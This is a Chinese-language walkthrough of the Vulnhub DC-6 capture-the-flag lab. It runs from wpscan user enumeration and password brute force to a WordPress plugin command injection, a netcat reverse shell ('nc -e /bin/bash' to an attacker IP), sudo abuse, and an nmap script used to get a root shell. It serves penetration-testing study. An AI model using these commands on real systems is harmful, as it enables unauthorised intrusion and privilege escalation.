Vulnhub | DC-6

信息搜集

主机发现、端口扫描

 

访问80端口，域名自动解析 ‘wordy’

在本地和kali的hosts文件写入192.168.0.141 wordy

Web渗透

后台爆破

 

用了wordpress的cms

用Kali自带的wpscan工具

wpscan --url wordy -e u

得到五个用户名

 

根据官方提示，生成密码字典

https://www.vulnhub.com/entry/dc-6%2C315/

 

 

 

若没解压需要自行解压，然后开始爆破密码

wpscan --url wordy -U user.txt -P passwords.txt

 

最终得到一个用户名和密码

mark/helpdesk01

访问登录后台http://wordy/wp-admin

漏洞发现

登录后发现有一个插件，可以记录用户信息

 

 

翻了一下都是刚刚爆破失败的日志

搜了一下，是这个插件存在漏洞

抓包修改参数，可以命令执行

 

反弹Shell

方法一

www.baidu.com |nc -e /bin/bash 192.168.0.106 9001

方法二

也可以直接使用msf下的exp

获取一个交互式的Shell

python -c "import pty;pty.spawn('/bin/bash')"

找一找敏感信息，有这4个用户

 

ls -alhR

 

 

通过寻找，找到另一个用户的账号密码

graham/GSo7isUM1D4

SSH成功登录

sudo-l

 

提权

发现jens用户无需密码可以执行sh脚本文件

那修改一下sh文件，然后运行试试

把反弹命令写入脚本当中，kali开启监听

 

 

 

jens可以在无密码情况下使用nmap命令

echo 'os.execute("/bin/sh")' > getShell

sudo nmap --script=getShell

最终flag

cat /root/theflag.txt

 

 

总结

1.信息搜集发现网站cms是wordpress

2.利用wp-scan爆破出后台的登录账号密码

3.进入后台发现历史漏洞，利用漏洞寻找敏感信息

4.发现可登录ssh账号，登录后寻找提权方法